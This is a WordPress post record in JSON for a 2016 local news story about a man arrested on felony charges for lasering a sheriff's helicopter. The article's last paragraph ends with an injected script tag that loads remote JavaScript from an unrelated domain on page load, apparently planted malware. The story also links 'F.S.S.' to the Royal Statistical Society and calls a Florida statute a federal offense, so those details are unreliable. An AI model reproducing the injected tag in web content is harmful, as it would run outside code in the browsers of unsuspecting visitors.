{"id":208343,"date":"2016-07-08T12:35:54","date_gmt":"2016-07-08T16:35:54","guid":{"rendered":"https:\/\/wordpress-1.tempurl.host\/?p=208343"},"modified":"2018-01-23T16:03:35","modified_gmt":"2018-01-23T21:03:35","slug":"weirsdale-man-arrested-laser-helicopter","status":"publish","type":"post","link":"https:\/\/thegraphicgeek.com\/demo-cflwire\/weirsdale-man-arrested-laser-helicopter\/","title":{"rendered":"Weirsdale Man Arrested for Pointing Laser at Sheriff Helicopter"},"content":{"rendered":"<p><strong>WEIRSDALE &#8211;\u00a0<\/strong>Lake County deputies arrested a man early Friday morning after he admitted to pointing a <a class=\"zem_slink\" title=\"Laser\" href=\"http:\/\/en.wikipedia.org\/wiki\/Laser\" rel=\"wikipedia\">green laser<\/a> at a Marion County Sheriff&#8217;s helicopter.<\/p>\n<p>The helicopter was working on an unrelated call when they were lasered 15-20 times of which 6 were direct hits to the pilot and spotter Thursday night at approximately 11:30 p.m.<\/p>\n<p>According to the police report, the helicopter pilot finished working their call and returned to the\u00a0spot where they were hit with the laser and then were hit a few more times. Using the spotlight, they were able to get a description of the residence and vehicles from where the laser came from. The then contacted Lake County deputies with the description.<\/p>\n<p>Lake County deputies were able to get the address of the residence using the description and officers were dispatched to the location where they found Phillip Willman.<\/p>\n<p>Willman admitted to deputies that he had pointed the laser at the helicopter but stated he only did it once.<\/p>\n<p>Willman was arrested and charged with six <a class=\"zem_slink\" title=\"Felony\" href=\"http:\/\/en.wikipedia.org\/wiki\/Felony\" rel=\"wikipedia\">felony<\/a> counts\u00a0of\u00a0pointing a laser light at a driver or pilot. He was transported to the Lake County Jail where he was later released after posting a $30,000 bond.<\/p>\n<p>Pointing a laser at a pilot or driver is a felony <a class=\"zem_slink\" title=\"Federal crime in the United States\" href=\"http:\/\/en.wikipedia.org\/wiki\/Federal_crime_in_the_United_States\" rel=\"wikipedia\">federal offense<\/a> as described by <a class=\"zem_slink\" title=\"Royal Statistical Society\" href=\"http:\/\/www.rss.org.uk\" rel=\"homepage\">F.S.S.<\/a> 784.062 (3)(a) which states, &#8220;Any person who knowingly and willfully shines, points, or focuses the beam of a laser lighting device on an individual operating a motor vehicle, vessel, or aircraft commits a felony of the third degree&#8221; and is punishable with up to $15,000 in fines and 5 years in prison.<script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WEIRSDALE &#8211;\u00a0Lake County deputies arrested a man early Friday morning after he admitted to pointing a green laser at a Marion County Sheriff&#8217;s helicopter.
